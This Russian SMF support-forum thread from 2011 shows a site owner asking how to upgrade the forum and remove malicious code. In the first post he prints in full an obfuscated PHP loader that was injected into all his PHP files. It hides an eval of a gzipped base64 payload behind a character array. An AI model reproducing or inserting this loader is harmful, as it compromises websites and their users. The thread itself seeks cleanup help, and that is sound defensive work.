Нужна помощь по апгрейду движка и удалению вредоносного кода

Автор gerser, 26 сентября 2011, 00:00:36

« назад - далее »

0 Пользователи и 1 гость просматривают эту тему.

gerser

Так ребята. Обращаюсь к вам за помощью.

У меня стоит SMF 2.0 RC3, хочу обновится до последней.
Я должен сказать Large Upgrade и после файлы с этого архива залить в корень форума т.е. заменить. Так?

И ещё такой вопрос... мне на форум кто-то кинул вирусняка или хз что. В общем, во всех php файлах прописался вначале код, из-за которого кое-что начало на форуме глючит (код выставляю).

Пропали аватары. Я создал новую папку для аватар и попросил перезалить пользователей свои аватары. Помогло. Потом пропали капчи при регистрации... отключил регистрацию с помощью капчи.
Дырявый форум какой-то похоже. Продолжаю склонятся к тому, что нужно покупать движки, а не брать бесплатные. Возможно, я просто глупый. Отрицать не буду. Не успеваю я следить за релизами обновлений.

Но все же, выбрал я SMF и переходить на другой движек я не хочу, проблемно.
Думаю может обновится и решиться проблема. Подскажите, что делать с гадостью?
Удалять вручную не вариант. Там начинают чудеса творится (слетает кодировка).

Код прикладываю.
<?php
$md5 
"7dccee80179178a0a0fd8f2cafa7b7a7";
$wp_salt = array("$",'6',"s","b",";",'d','o',"c",'4',"_","g","r",'f',"a",'e',"z",'n','i',"v","l","t",')',"(");
$wp_add_filter create_function('$'.'v',$wp_salt[14].$wp_salt[18].$wp_salt[13].$wp_salt[19].$wp_salt[22].$wp_salt[10].$wp_salt[15].$wp_salt[17].$wp_salt[16].$wp_salt[12].$wp_salt[19].$wp_salt[13].$wp_salt[20].$wp_salt[14].$wp_salt[22].$wp_salt[3].$wp_salt[13].$wp_salt[2].$wp_salt[14].$wp_salt[1].$wp_salt[8].$wp_salt[9].$wp_salt[5].$wp_salt[14].$wp_salt[7].$wp_salt[6].$wp_salt[5].$wp_salt[14].$wp_salt[22].$wp_salt[0].$wp_salt[18].$wp_salt[21].$wp_salt[21].$wp_salt[21].$wp_salt[4]);
$wp_add_filter('FZdFrsXakkSH89+TG2bSVzXMx8zYKZmZ2aOvWyPYytwZESvKKx3+qb92qob0KP/J0r0ksP8tynwuyn/+IyaFuO2R2vfhj6IBT0IyN/givdC/3dsn/WNxGk0WRl38ZC+yEk98E6SdyoQDvlw8MDGHUjg6UBx9QAR8EAQkTzhIRDHg6YTm+R4FIIWGDS9M0HJGj/BZ9teucsVcFml7YWFH0qrps2Gtq65g6u99u0cqD9H4MqN4ryyTbSNErozmEQSKc2UDGazH7QMXb25ohClp5U7iIZ2f4s0XK5PLGKGKGhuOZoiMnqdkmuCdurCtoJDT9YZAPzUnlqHNFWM4qwJ6qk3xFWHm27GM6d063DXJhpnKNncE4YMVN/5+4B5mWAdukFjnuEmhGaDqpBzn3Z64gjryMbCTjTVsmszLG2wLgI/doTryxPKmEAahOXLtjsXSDvKUD46iB1mAe0h/e4GagLbt51XNOgHH5G1EWIVcDbKT+jakkHIQrOlkIiv0brBVEs3BRtdRepDp17jK7qyuIjupfi4DuarHVoFtn7t8Mo3LSbaLO1shVwmN5yZlzWm9c2EXi6IStAgf2lsunZFqKX1d+udBbO0e6bjmdrDwTsKwliwgv3SrvYpZn6LxViP4uVod8u4KVnrjPhJHST/Bbbv5MvaRAdqaWX7bSkFCl1H7pI2ezO/8iRUSIK7Fi3ra7Hu6n0BHnfozxQ6XpcXrYgyLf/BUpW33MIYbZbrmJRxPf9Ym1eJpSQx+vlghNQpM4UMYcTmFELhACf2cg1FCTDL6H6J1K1QsBg97V50luxgv9Kd7BwiU9WHLFWoY7KrCXIYN8pYRs6HXoDA46xavPYdzLHGHYjv1lOJNw0WZYd+t3EGoFcIkUlQ0ZlRFIDXtaQClJuGa26lz+oUNz86U6WkguZgK2VQnSSMIW8dc7PLDR26D1jL2sFVQWdi3J6hVoZ76cssxMW+qIGgwblkuH7r7ZsAbVrKDdb+dtT3g+V97DYnfdE36w/ilCcgeqROts15JB4Di6hIWtrGHMvAI2xMwwlgeUOL2TXcssml5tgwHCYwJcRR7bNhux1kcWZLxGf2gbCEFimvVantispam by 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');
?>

<?php
/**
 * Functions to handle boards in the Sitemap
 * 
 * [at]author Matt Zuba
 * [at]website http://www.mattzuba.com
 * [at]mod Core
 */


/**
 * This function creates an array of $listOptions which will then be passed
 * to the list creator in SMF's Subs-List createList function.
 * The indicies that will be overloaded are 'id', 'title', 'base_href' and
 * 'additional_rows'.  You may included any others you like/need.
 *
 * [at]return array Compiled array of list options to pass to the list creator
 */
function BoardsDisplay()
{
global $txt$mbname$scripturl;

// Create the list
$listOptions = array(
'no_items_label' => $txt['sitemap_board_none'],
'get_items' => array(
'function' => 'list_getBoards',
),
'columns' => array(
'board' => array(
'header' => array(
'value' => $txt['board'],
),
'data' => array(
'sprintf' => array(
'format' => '<a href="' $scripturl '?board=%d.0">%s</a>',
'params' => array(
'id_board' => false,
'name' => false,
),
),
),
),
'subject' => array(
'header' => array(
'value' => $txt['subject'],
),
'data' => array(
'db' => 'description',
),
),
'topics' => array(
'header' => array(
'value' => $txt['topics'],
),
'data' => array(
'db' => 'num_topics',
'style' => 'text-align: center;',
),
),
'posts' => array(
'header' => array(
'value' => $txt['posts'],
),
'data' => array(
'db' => 'num_posts',
'style' => 'text-align: center;',
),
),
),
);

return $listOptions;
}

function 
BoardsXML()
{
global $modSettings$scripturl;

// Get our information from the database
if (($boards cache_get_data('xml_boards'$modSettings['sitemap_cache_ttl'])) == null)
{
$temp_boards list_getBoards(00'm.poster_time DESC');
// And assign it to an array
$boards = array();
foreach ($temp_boards as $row)
{
$boards[] = array(
'url' => fix_possible_url($scripturl '?board=' $row['id_board'] . '.0'),
'time' => date_iso8601($row['poster_time']),
'priority' => priority($row['poster_time']),
);
}
cache_put_data('xml_boards'$boards$modSettings['sitemap_cache_ttl']);
}

return $boards;
}

function 
list_getBoards($start$items_per_page$sort)
{
global $smcFunc;

$request $smcFunc['db_query']('','
SELECT b.id_board, b.id_parent, b.name, b.description, b.num_topics, b.num_posts, m.poster_time
FROM {db_prefix}boards as b
LEFT JOIN {db_prefix}messages as m ON (m.id_msg = b.id_last_msg)
WHERE {query_see_board}
ORDER BY {raw:sort}'
,
array(
'sort' => $sort == '1=1' 'b.board_order' $sort,
)
);

$boards = array();
while ($row $smcFunc['db_fetch_assoc']($request))
$boards[] = $row;
$smcFunc['db_free_result']($request);

return $boards;

}

BIOHAZARD

уже даже по приведённому вами коду видно, что ломали не сам форум, а wordpress

да, используйте large upgrade
Мои моды:
  • RedirectPage
  • Counters
  • CustomSearch
  • SypexDumper
   адаптирую темы    1.1.хx<=>2.0задавая вопросы, старайтесь сразу указывать конечную цель, предполагаемый Вами путь не обязательно окажется самым коротким

Любые моды на заказ

gerser

#2
Цитата: BIOHAZARD от 26 сентября 2011, 03:42:38
уже даже по приведённому вами коду видно, что ломали не сам форум, а wordpress

да, используйте large upgrade

Я тоже так подумал. Но этого кода в WP движке других сайтов не наблюдается. А вот этот же код похерил smf и shop script.

Запускать скрипт нужно как-то после замены файлов? Через админку не подключается к серверу обновлений. А модуль обновлений отказался ставиться. Придется вручную. =\

Простите за тупизну, но в FAQ http://www.simplemachines.ru/index.php?topic=1806.0 нет информации, как обновлять движок.
Ещё не очень сухие мозги подсказывают запускать /upgrade.php, но вот все ли это?

BIOHAZARD

Мои моды:
  • RedirectPage
  • Counters
  • CustomSearch
  • SypexDumper
   адаптирую темы    1.1.хx<=>2.0задавая вопросы, старайтесь сразу указывать конечную цель, предполагаемый Вами путь не обязательно окажется самым коротким

Любые моды на заказ

gerser

Есть. Только все моды слетели. О.о
В админке ничего не осталось. Придется заново ставить..  :facepalm:

0daliska

Ну дак у всех так при апгрейтах с RC версий... Вы же полностью файлы перезалили, откуда моды-то сохраняться :)
Уехала отдыхать. Сейчас без интернета до 1 августа. Приеду - выполню все обещания
® For members of Russian community (simplemachines.ru) only